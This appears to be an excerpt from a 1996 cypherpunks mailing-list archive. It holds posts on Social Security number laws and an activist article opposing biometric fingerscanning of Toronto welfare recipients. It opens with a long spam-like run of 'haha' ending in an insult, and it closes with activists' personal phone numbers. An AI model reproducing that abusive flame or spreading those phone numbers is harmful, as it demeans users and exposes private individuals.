hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha You fuckhead Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ 9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi mUqFH41Z7NkyO8ZFdi5GGX0= =CMZA -----END PGP PUBLIC KEY BLOCK----- From alano at teleport.com Fri Sep 20 16:18:37 1996 From: alano at teleport.com (Alan Olsen) Date: Sat, 21 Sep 1996 07:18:37 +0800 Subject: DL in exchange for fingerprint Message-ID: <3.0b16.32.19960919224547.00c48460@mail.teleport.com> At 03:10 PM 9/19/96 -0700, Timothy C. May wrote: >At 9:13 PM 9/19/96, Gary Howland wrote: >>> Paraphrasing that famous quote, just which part of "not for identification" >>> don't they understand? >> >>Hmm - who are you paraphrasing here? (Just curious). > >"What part of "No" don't you understand?" > >and > >"What part of "Congress shall make no law" don't you understand?" The question as to Social Security numbers came up earlier today in a conversation off-list. Do any of the lawyer types that hang out here know the exact statutes as to use and misuse of Social Security numbers? My understanding (probably flawed) is that it is (or was) illegal for certain types of businesses to ask for SS numbers. Does anyone know what the actual laws regarding this are? Pointers to statute numbers would also be appreciated. Also, I noticed that the text "Not for Indentification" does not appear on later versions of the Social Security cards. (Comparing my card with my fathers showed some interesting differences. That text change was the most glaring.) --- Alan Olsen -- alano at teleport.com -- Contract Web Design & Instruction `finger -l alano at teleport.com` for PGP 2.6.2 key http://www.teleport.com/~alano/ "We had to destroy the Internet in order to save it." - Sen. Exon "Microsoft -- Nothing but NT promises." From EALLENSMITH at ocelot.Rutgers.EDU Fri Sep 20 16:36:47 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Sat, 21 Sep 1996 07:36:47 +0800 Subject: RRE: fingerscanning Message-ID: <01I9PFEM77JC8Y50ND@mbcl.rutgers.edu> From: IN%"rre at weber.ucsd.edu" 19-SEP-1996 22:33:45.99 To: IN%"rre at weber.ucsd.edu" CC: Subj: fingerscanning X-URL: http://communication.ucsd.edu/pagre/rre.html X-Mailing-List: archive/latest/1308 [For those of you who are just joining us, RRE has been following a controversy in Ontario about the use of biometric encryption to identify welfare applicants in Toronto for purposes of fraud prevention. Critics assert that welfare applicants are being criminalized under the cover of combatting a fraud problem that doesn't really exist; supporters assert that the new scheme would be less cumbersome for everyone involved than the existing identification methods, and that, unlike most biometric identification schemes, this encrypted scheme does not require the applicant's fingerprint to be captured in a form that could be used for law enforcement or other purposes. The case is important because biometric encryption is a leading example of the "privacy-enhancing technologies" that will become increasingly important as a technical means to reconcile functionality and privacy in technical systems. I honestly do not know which side is right, and I have friends among both supporters and critics of such systems.] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= This message was forwarded through the Red Rock Eater News Service (RRE). Send any replies to the original author, listed in the From: field below. You are welcome to send the message along to others but please do not use the "redirect" command. For information on RRE, including instructions for (un)subscribing, send an empty message to rre-help at weber.ucsd.edu =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Date: Mon, 16 Sep 1996 23:49:23 -0400 (EDT) From: Sarah Vance Subject: fingerscanning article this an article about fingerscanning that I wrote for University of Guelph's student newspaper, the "Ontarion", with lots of help from Orenda Davis and Jennifer Kohm. It's not as comprehensive as the info doc, but maybe a tad more readable. sooooo please. forward. reprint. etc. Solidarity, Sarah ______ A new threat to the privacy and autonomy of all Canadians received government's stamp of approval over the summer when Metro Toronto Council approved a plan to fingerscan area welfare recipients. Politicians claim that this will cut costs by reducing welfare fraud, which is estimated at under 3% of Social Service expenditures. Social Justice advocates question the fairness and fiscal responsibility of paying a consortium led by three large corporations, the Royal Bank, Great West Life Assurance Co., and Unisys Canada, millions of dollars to develop the program when welfare fraud is such an insignificant problem. The decision seems particularly questionable since New Zealand recently abandoned a similar system, having found that its costs far outweighed its benefits. A key reason for implementing the program, explains Metro's Human Services Committee report, is to make municipal Social Services compatible with provincial government plans to use biometric identification to "cover a range of programs". In Spain biometrics have been used for Unemployment benefits, and in the United States a bill was recently discussed that would have used it for a host of programs, including health care and immigration. Technology companies, such as Mytec, are promoting fingerscanning for these services in Canada as well. Fingerscanning is often confused with fingerprinting, although there are substantial differences. In fingerscanning, a machine takes your fingerprint pattern and converts it into a unique set of numbers and letters. A central computer database holds these codes, which can be accessed by authorized groups. For Metro's plan, the system would be designed to catch people trying to receive extra benefits by applying for welfare under different aliases. The proposition raises the specter of corporate control over the welfare system by threatening to bring in private sponsorship. Metro Committee documents emphasize "the further exploration of the feasibility of C.I.B.S. [the fingerscanning plan] applications to other corporate initiatives." The Committee's suggestions for the future of the welfare system include "obtaining credits for our customers from various suppliers - supermarket chains, drug chains, educational institutions, dental clinics, property management companies, clothing stores.." Although this may sound fairly innocuous, it erodes the privacy and freedom of choice of people struggling below the poverty line. Presently, program benefits like dental care only cover certain services, and are available to limited cash amounts. The Committee's report suggests that corporate credits, such as those from grocery or clothing stores, would be handled in the same way: the government would control both the type of goods individuals purchase and the amount they spend on food, education, and other necessities. It makes it possible for politicians to decide things like whether or not it is acceptable for poor people to buy cigarettes or junk food. It is not inconceivable that in the future this power could deny low income people freedom over choices as personal as buying birth control. As well, those reliant on benefits would have to buy from corporate sponsors. It would be irrelevant if their prices were relatively expensive, their location inconvenient, or their policies in conflict with an individual's cultural or political values. Currently, the government records the location, time, and details of dental benefit transactions. It is likely that credits from drug stores and other corporate sponsors would be monitored in the same way. In spite of this, Metro Councilors are so enamored with the fingerscanning proposal that they are prepared to recommend it for nationwide use. Toronto's Department of Social Services even hopes to make some revenue off its expansion by selling the scheme to other jurisdictions. The spread of biometric identification happened similarly in the United States. In recent years, its use on welfare recipients has become increasingly prevalent. As the idea of biometrically identifying the public has become more socially accepted, federal politicians have started considering its usefulness for a myriad of services and personal information. In February, Congress discussed a bill that would have used fingerscanning to develop a centralized database containing personal information on every adult in the country. This data was to be made available to a variety of government and corporate interests. Even those claiming to be potential employers would have had access to an individual's immigration, welfare, and health records. In Toronto, assistance recipients can be seen as the test case for widespread use of fingerscanning in Canada--the beginning of a slippery slope. The Royal Bank's involvement in fingerscanning Metro welfare recipients is particularly problematic. If the plan is implemented, all 31 200 of Toronto assistance recipients who do not currently have bank accounts will be forced to access their benefits from an account set up for Social Services by the Royal Bank. The only way they will be able to do this will be through bank machines: The Royal Bank is not interested in investing the time and resources necessary to personally service these "clients". Instead, they have agreed to provide a training session in which these people will be shown how to use bank machines. However, unless this session 1) trains people not to have mental illness 2) dismantles the cultural barriers to using bank machines and 3) teaches people to read and write English or French, many of these 31 200 people and their families will have great difficulty accessing their assistance funds. There is also a question of who will pay for Royal Bank user fees. Brett Fleming, a Bank executive involved in the negotiations, has stated that "we'll all have to bear some of the pain". They have kindly offered to forfeit the profits for at least two user charges per month. Fleming claims that Metro Social Services will likely cover 5 more Interac charges per month for each of these recipients. At current rates, this would cost taxpayers $2 340 000 a year... Fortunately for Brett, it seems that the Royal Bank's "pain" will be minimal. Activists in the United States, are finding it difficult to eliminate the practice of fingerscanning, as it has quickly become entrenched in American public policy. In Canada, biometric identification is new enough that it can be challenged more easily. Legal and social justice groups are already mounting campaigns to put an end to Metro's plans before the deal is finalized. A group based in Guelph has formed with the goal of forcing the Royal Bank to withdraw from the consortium, making it difficult for the program to proceed. The campaign's strategy is to use a boycott to draw negative attention to the Royal Bank, forcing them to question whether they are willing to risk their reputation for the fingerscanning plan. The campaign is urging people across the province to withdraw their student loans, accounts, and RRSPs from the Bank. If you are interested in getting more information on Metro's fingerscanning plans, or in joining the fight against it, contact Orenda Davis @ (519)763-5292 , or Sarah Vance @ (519)763-6726 . ____________________________________________________________________________ FIGHT FINGERSCANNING! (it IS possible) Join the province-wide campaign against fingerscanning, based right here in Guelph Make funds and support available for people on welfare who risk not to be scanned Donate resources.... photocopying, faxing, use of phones, artistic talent, your TIME, your skills 